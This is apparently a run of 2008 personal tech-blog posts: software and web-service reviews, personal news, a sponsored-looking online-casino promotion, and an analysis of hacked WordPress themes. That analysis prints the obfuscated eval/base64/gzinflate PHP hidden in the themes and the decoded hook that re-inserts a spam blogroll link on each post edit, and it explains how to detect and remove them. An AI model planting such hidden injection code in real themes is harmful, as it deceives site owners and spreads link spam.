How about a personalised Firefox 3 Download Day Certificate?

Hopefully, by now you’ve grabbed your copy of Firefox 3 and consequently played an active role in helping our favourite browser set a new Guinness World Record. Here’s an added perk for being such an avid follower of Firefox – a personalised Firefox 3 Download Day Certificate stating your role in helping Firefox achieve the world record. I got mine just now and here’s what it looks like…

Firefox 3 Download Day Certificate

Getting the certificate is as easy as filling up this form (with just your name) and grabbing the generated PDF File.

Incidentally, I managed to grab my copy of Firefox 3 only today morning – almost 12 hours after the official release. Last night it was literally impossible to access any of the Firefox download sites due to the initial download rush.

Installation went smoothly and all my earlier settings & bookmarks were preserved – though a couple of extensions failed to work (Fasterfox, FEBE and TabMixPlus). None that I will sorely miss, (for the time being) except  for FEBE.  On the good side, FF3 DOES take a shorter time to fire-up. How about you? How was your initial experience with FF3?

Hurry… Get a Free Membership at a Premium WordPress Themes Club

WPDesigner Premium WordPress Themes Club - Free Membership

BlogAdda – an Indian blog showcase (directory) is giving away 100 free memberships to the Premium WordPress Themes Club of WPDesigner.

Normally, a one year membership of the club costs you $5, for which you get access to 12 premium themes (1 every month). As long as the offer from BlogAdda stands, you can get this for free. No sign-ups with BlogAdda are required. Simply read this post at the BlogAdda Blog, and leave a comment there stating your name & email correctly and include a link to the most popular post on your own blog.

They’ll get back to you in a day or two with a promotional code which you can use at the WPDesigner site to alleviate the charges for the first year.

Alternatively, you can follow BlogAdda on Twitter to claim your free membership.

I had left a comment there yesterday and by today noon I had my promotional code delivered to me. Last I checked, they have around 48 comments on that post (including comments from those who’re following BlogAdda on Twitter). If you hurry, you may still be accommodate in the last 50….

LC ISO Creator: Probably the smallest (and portable) no-frills ISO maker

Here’s a quick pointer. If you want an CD/DVD ISO Image Creator that does just what it’s intended to do, you should try this fantastic freeware named LC ISO Creator.

It’s this incredibly tiny download (14kb compressed) and runs straight out of box – i.e. no installation is required. It doesn’t require any crappy driver installation either. This can make it an invaluable addition to the PortableApps Suite.

LCISOCreator Screenshot

The interface is very minimalistic and doesn’t sport any Settings or Options dialog. It took me around 9 minutes to convert a 3GB DVD into it’s ISO counterpart – pretty good for such compact coding. It even support Unicode. Your only qualm might be that it cannot handle copy-protected disks. Who cares! There are plenty of specialised tools for that.

This one’s headed straight for my PortableApps folder on my USB key.

goosh: The Shell Lover’s Google

UNIX ShellThis one’s for all the Unix geeks and shell lovers out there… Goosh is a cool new service that lets you access a large selection of the Google applications through a command-line interface. The hardcore techies will definitely love the look and feel (and functions) of Goosh. The author, Stefen Grothkopp made it pretty clear that it’s not an “Official Google Product” – but is there just for fun.

When you first get to the site, there’s not much to meet the eyes except for some barebones instructions and a shell prompt. But then again – that’s how the real shells are. To get going you’ve to call-up the help page and get a list of available commands. The author had the foresight to implement bash-like aliases – thus cutting down on a lot of typing. The alias for help is h and here’s a screen-shot…

Goosh Screenshot

To perform a simple Google Search, you key in search {searchterms}. For example, if you’re searching for pages on AdSense, you’ll have to key in search AdSense. The actual command to perform a Google Search is “web“, “search” being an alias for it. Apart from normal Google Search, you can also fire away shell commands that call-up the I’m Feeling Lucky function, Google Image Search, Google News + Blog + Feed + Video + Map Search and even Google Translate! That pretty much covers the most utilised Google apps. As an added perk, you can perform Wikipedia searches too. Good job Stefan.

And yup, there are localization commands too – allowing you to change the default language of the interface. Also supported are command history and tab completion.

Goosh is based on Google’s Ajax Search API and is one of the best implementations of it I’ve come across so far.

Found via: My SysAd Blog

DNSRank: New kid in the same old block

DNSRank is an all new juvenile entrant in a jungle full of raging tigers. What I mean to say is that, they’ve decided to join the whole SEO bandwagon with almost no originality on their part – which might make it very difficult for them to survive for long.

The site definitely has that Web 2.0 jazz & sparkle to it and is very well laid out. They describe themselves as a “Domain Evaluation Tool” – but I’m sorry to say that they fall way short of expectations in this quarter. Eye-candy isn’t all !! Lets face the reality. There are plenty of age old predators in this field, starting from web-based services like SEOMoz & Xinu to awesome Firefox extensions like SeoQuake, SEOpen & SearchStatus. Most of these tools give far more comprehensive information and Search Engine Optimization tips than the barebone skeletal outline offered by DNSRank. While utilising their service, I couldn’t find a single tool that could spike my interest… except maybe for the section that displays sites which share the same IP as yours. Then again, there are plenty of other services on the net that cater to just this, as a simple Google Search reveals.

DNSRank is still in it’s infancy. Running their own tool on their own domain reveals that even the domain registration is just 29 days old (on the date of writing this review). Judging by it’s age, we can certainly cut some lax. If they have market domination (or at least gaining a large percentage) in mind, they’ve already lost out of the beginning battle. They totally failed to cash in on the element of surprise (by introducing new tools & tricks) – which is so common to any Web 2.0 startup these days. If they’re really out to set a mark on the wall, they need to strive much much harder than this.

befunky: Cartoonize your favourite pictures in a jiffy

Here’s the latest addition to the Web 2.0 bandwagon – befunky – a quick & dirty way to cartoonize your favourite snaps in a jiffy.

The site sports a simple flash interface that allows you to upload your snaps (either from your Desktop or by direct capture through a webcam) and convert them to cartoon caricatures. There are a couple of easy-to-understand parameters like Sketch, Colour, Warp and Goodies which can produce widely varying end-results. You can crop or rotate the picture once you’ve uploaded it, adjust the brightness & colour levels, apply different warp brush sizes as well as do a multiple variations of flipping & layering. You can even add frames, modify facial features (hair, lips, eyes etc.), throw in accessories like jewelry, eyeware & hats and top it up with some custom funky text. The resultant pictures are really cool! Here’s a simple example with the most basic effect applied.

befunky: Before & After

Soon to come is a new feature that’ll allow you to transcend the boundaries of static pictures and apply the same effects to videos as well. Oh Yes! Full-length running videos. Ain’t that awesome?

The site sports a comprehensive Tips & Tricks section which gives you creative tips on how to best utilise the toons you’ve just created, which range from personally branded merchandise to e-cards and ways to spice-up your costume parties. All in all a very easy-to-use and useful web-application that can find a large audience – specially in graphically challenged people, like me 😀 Can prove to be a viable option for those who don’t have access to Adobe Photoshop and it’s plethora of filters.

Found via: System Hacks

Chaotica: New theme for Chaos Laboratory

Finally got around to doing something that has been pending for ages… i.e. give the site it’s own look & feel.

There are plenty of good WordPress themes around – but almost all are overused. I needed something fresh and unique (if possible). I had contacted a few designers but their starting prices ranged $300 to $400 – something that I would rather spend on getting better hosting (dedicated server maybe) or on advertising. In the end, what had to be done – had to be done. Got down on my hands and knees and started designing one on my own.

Adobe (formerly Macromedia) Fireworks helped me a long way in designing all the graphics for the theme. Thanks to Twitch for the logo (lab flasks) – that really brightened up the page.

Once the initial issues with the CSS were sorted out, it was time to port it to WordPress. That was the easier part though and you can see the result proudly on display here. Incidentally, I decided to name it “Chaotica”. Yeah, I know – it’s pretty cliche. But that’s the best I could come up keeping at par with my site name. Maybe you can suggest a better alternative for me!

There are plenty of “cool stuff” that I’m yet to implement – but whatever I’ve put up so far isn’t bad for a first-timer ! What do you say ?

Dissection of a hacked WordPress Theme (how the hacked themes inject links and how to detect them)

Hacked WordPressWhile I was away on my sabbatical (read coping with the all-new fatherhood), I occasionally managed to catch a glimpse of the latest action dramas unfolding on the net – primarily because the WordPress dashboard made it a point to present them to me on a daily basis. One of them caught my fancy and I decided to take a deeper look. The topic was Technorati & hacked WordPress blogs. More than Technorati, it was the article on Weblog Tools Collection that got me wondering…

The premises

While I had made it a point to keep abreast with the WordPress releases and firmly believed that my blog wasn’t affected by this, I wasn’t quite so sure about a couple of other blogs that I had installed for my friends / clients. Going through a few of them, I noticed that all of them had a profuse amount of random & unrelated links in their footer besides containing links to a group of common sites in their blogroll. While the footer links were more or less random (and still acceptable), I couldn’t believe that, strangers as they were, all my friends & clients had managed to put their heads together and point to the same group of sites! Naturally, I got asking and found out that none of them had ever added those links in person and that even they were confused as to where they came from. Being new to blogging most of them had taken it for granted that those links were a part of the WordPress ring and had been placed there as a reciprocating gesture for providing such a terrific blogging platform for free.

The investigation

My first step was to dig into the file footer.php, where I encountered this strange sequence of code. Here’s an example…

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';
eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96))); ?>

Looks scary, doesn’t it? 😀 Managed to give me a fright at the first sight too. Whereas, I was expecting a bunch of hard-coded links, you get this!! Fear not. A second glance will tell you that the code isn’t really as mambo-jambo-ish as it looks. It contains 2 distinct php statements. The first one is simply the assignment of the scrambled sequence of characters to a horribly named variable i.e. $Gdb63b0c686622a27d0bdb237219e0e96.

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';

This statement alone didn’t make much sense though. It was the second statement, with it’s share of nested functions, that started shedding light on the whole issue…

eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96)));

If you’re familiar with php even a bit, you’ll begin to realise that this statement decodes whatever nastiness is lurking in the first line and helps executing it using the eval() statement. Prior to that, the code has been base64 encoded (the same encoding that is applied to email attachments) and then gzipped – if you follow the order of decoding.

To really get behind the mystery code, you need to be able to SEE it. Rather simple. Just replace the eval() statement with an echo and it’ll spit the code out onto your screen instead of executing it. Following that, we modify the code block to look like this…

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
mOqyG4gt2mPr1UI/oL0tSUmPRmvP2iK2pGrGawz98ZW/NhAaWl9kj2ae9
52xdFCZLM1F3WyyuEDRaKK9KBrUQTxv/WONb6atgEKxF9nB1x5OjauMP
bvdlrH1jWbMSxOwYBeG7e1HOChpWl0hybNzjCH1thKgG96LOSBWK+un
XC2a8hpUcLMByN4mCXw/w+C6bQmNeUJgB9R57wLDTxfKY0CiO6j1xdg
KuEYQ3vUYsITTIGKJfQJyLfZ1jEGSqCvW2REbpn7A0FR7QmLo9XAHhrcE
47azzQA+uNaxiSUugC4vGNhQFExhelasV1+QTGWj+KcBMg11wPNe1Mz
+g5R936cXXeiREzAOZEgL18rOGsYyIY6TJFnrXhsj1LdpnYYA8LhUwT1a
1g1lUitI4Lg0GrXGUfhxFDH8o8YW4RjcxZSvOFmzeUyltMdxCJR2JNQzaeL
MWrON5D9bEupvhrNTUDPnSnl5oALR+7wLzXyMhPpqORgk2N0/PNxOR
n6/XhyF26hG+UvK52Vj6eIKSzPpo6M38bfNLCxqBxVybrs2/9XhqL2bILB
8pTBnsmkx5MTO797NCYSFsyUtzOstmrJ7n8+neoZNl0qeXDlMmTW3zW
xg8wc=';
echo gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96));
?>

Save this code in a new php file and execute it from your local php-enabled web-server installation (in my case XAMPP) and here’s what you get…

footer

< ?php wp_footer(); ?>

Pretty much, the kind of code you’d expect in a WordPress theme footer. While one can accept the link to http://wordpressthemes.weblogs.us as the default link to the theme hosting service, I couldn’t understand what Vacation Reality had to do with it. Still, so much for the footer. All I had to do now, was to remove the whole block of code and create a clean footer as specified by my clients.

The second complaint was regarding those common links that kept appearing in the blogroll. As it turned out, some of my clients had tried deleting those links only to have them re-appear a couple of hours down the line. Time to investigate again. This time it was the file, functions.php. Didn’t have to look far. A search for the terms eval andbase64 got me to the desired point. Once again I faced a block of code that went like…

< ?php }
$Q0d299dceb2cb08cb71bfbc1414b1505a='hZBBawIxEIXPm18xDAUTsN
pzZb3ISg9tBbvFY4gmajCbhCTbUMT/3m6qpx68DTPfvPdmiJCSi13SzlJUUi
fuXUw4Rm2jComno+oUN9qekM3IvrcFhX9TyuBMqoNxW2HgIXu5nZFK72k
pH+cHlfiXCBQ/mtdm0cJi9fne0mGRa8lguV69wRUdmhE2L826gQL0wdSjY0r
+eTrNOU+yC9IHFWPsvTdaxcnOdSNkdf3ESFVlz6/pSi4RgvimWJSs6BRCPQ
fc3DSgHU6IOAa8mf0R9wwR2O9DLuQH';
eval(gzinflate(base64_decode($Q0d299dceb2cb08cb71bfbc1414b1505a)));
?>

Taking the same road as the first time fetched me this very interesting block of code..

add_action("edit_post","insert_theme_link");
function insert_theme_link() {
    global $wpdb;
    if($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://www.wordpresssupplies.com'")==0)
        wp_insert_link(array("link_name" => "Wordpress Themes", "link_url" => "http://www.wordpresssupplies.com" ));
}

The code should be fairly self-explanatory. What we have is a function named insert_theme_link that adds a link to wordpresssupplies.com to your blogroll (contained in the table wp_links in the WordPress database), if the link isn’t present. The noteworthy line here is add_action( "edit_post","insert_theme_link" ).

The add_action function is a plug-in API hook for WordPress.

  • The first parameter dictates which WordPress action to hook or watch out for.
  • The second parameter is the name of the function that is called when the hooked action occurs.

In our case, the action is edit_post, i.e. whenever the blog author edits a post, the function that adds the link to the blogroll is executed. Hence the mysteriously re-appearing link !

The nexus

W A R N I N G!Hot on the track, I decided to follow the link that was being injected here.. i.e. wordpresssupplies.com – just to make sure this wasn’t a random case and I am not tarnishing their reputation anyhow by unjustifiably pointing fingers at them. I dropped by their site and picked 3-4 themes from different categories. And what do I find? Every single one of them contained similar code – both in the footer as well as the functions.php. Not just that – studying the links led me to two other sites teeming with hacked themes. For your convenience (and warning) I’m listing them here.

  • http://www.amazingwordpressthemes.com/
  • http://wordpressthemes.weblogs.us/

All of them are nicely decked-up and look like legit. WordPress theme sites. But be wary of any themes that you download and use from these sites for they’re certain to contain such code blocks. Apart from these links, you may also notice some other random links being injected – links to car loan sites, cheap dedicated servers etc. – shady businesses which have probably paid the hacked theme sites to insert their links and thus gain PR (pagerank) out of millions of unsuspecting sites utilising these themes.

I tried doing WHOIS on these domains, but that’s where I met-up with a wall. They’re either cloaked with Privacy Protect or contain spurious information regarding their owners. But I have a feeling that under the hood, these spammers (I prefer the term spammers here to hackers – as the people who’ve injected this code into the theme are nothing but link spammers) belong to the same group or it’s the work of a lone individual.

The Philippino blogger Yuga, outlines a couple of other methods followed by these spammers to capture / break your WordPress installation. The article is a must read.

The conclusion

On a sidenote, these themes can still be used if you carefully snip the spammy code out. Normally, the code-block in functions.php can be entirely eliminated without affecting the theme at all. As for the ones in footer.php, you’ll have to study the underlying code and eliminate the links to these sites, keeping the rest.

For those who want to experiment with such themes, I’m listing a few here for direct downloads. Disabling these themes or switching to another one will (normally) get rid of the injector code – but even then, USE AT YOUR OWN RISK.

Downloads

[download id=7,8,9]

If you manage to dig-up any other hacked theme sites like these, make sure you leave a comment enlisting them. It’ll serve as a warning note to all those who read this. And of course, if you have any thoughts to share on this issue, feel free…

Getting back to blogging…

Getting back to bloggingFinally… decided to shake off that writer’s block and squeeze some time out of the demands of fatherhood and get back to serious blogging.

Oh Yes ! For those who didn’t know, I was blessed with this beautiful little bundle on the 10th of February, 2008. Life has never been and never will be the same 😀 The bundle is a “he” – i.e. a son and has been nick-named Adi (which roughly translates to Ancient or The Very First. He’s an absolute delight to be with, though more than a handful, when he realises he’s home alone with me. More on that later…

Other than that Google decided to strip me off my pagerank, which stood last at 5 as I was involved in paid-blogging – a policy that sent up such an uproar all over the blogosphere. Seems like Google decided to take it all out on the smaller sites (mine dropped to ZERO) while just marginally denting the bigger ones. Zero is where it stood for several months – till a couple of weeks back I saw it jumping up to 2. My site’s crawling back into the PR space I guess. Luckily, it didn’t affect my traffic anyhow and although I had stopped blogging altogether, the older content was enough to keep up a steady flow.

In the professional front, my work-load has trippled. Learnt many new tricks (I had long wanted to) – such as developing a complete WordPress theme right from scratch. I picked a template out from the free ones provided by TemplateWorld and got going. The result after 1 week of messing around with the WordPress Codex can be seen here. I’m kinda proud of it and I must say, not bad at all for a weeks work starting from level zero.

Updated a few of my WordPress plug-ins too, namely curreX and LiveSig – making them way cooler and better. Also shifted the plug-in base to the SVN hosted by WordPress.

More later… in the upcoming posts. I’m teeming with ideas and the next few weeks will see plenty of them pouring forth.

Cheers!

OnlineCasinoBluebook: Your ultimate guide to online casinos

Online CasinoDoes that risk-taker in you makes its presence felt every so often? Does that involve gambling? Lets face it – all of us would squirm inwardly with pleasure at the prospect of making a quick bundle online. And many of us have tried out their luck sometime or the other. To cut our work short for us, there are millions of online casinos sprouting up at every nook and corner of the net. But do you even know for sure that the casino you’ve blown up a fortune at is for real and not just some scam site designed to make you part with your savings in the shortest possible time? If you’ve had panic attacks on such issues – fear not, cause Online Casino Bluebook is here for your rescue.

The site maintains a nice list of the top ten (and legitimate) online casinos along with a couple of pertinent factors that can help you choose the casino that is right for you. These include the world rankings, welcome bonuses offered, payout percentages as well as solid reviews. The listed casinos are the ones where players will be able to play number one Vegas style casino games like craps, baccarat, blackjack, slots, poker, keno and bingo. The site maintains separate listings of casinos that offer a single type of game only (Poker, Bingo, Roulette etc.). They’ve even dedicated a section to No Deposit Casinos where you don’t have to pay up a bundle beforehand to start playing.

If you’re in a dilemma even after studying the list, you can always get in touch with their support team – who’ll guide you through the process of picking the best casino tailored to meet your needs.

Been cheated/scammed by an online casino ? They can advise you in this regard too, or just point you to sites which act as the casino watchdogs on the net.

The site has a very simple yet easily navigable layout – with easy access to all the important links that you may ever want. However, it could definitely do with a face-lift (a better template, that is). End of the day a bulk of the netizens tend to trust more of eye-candy sites.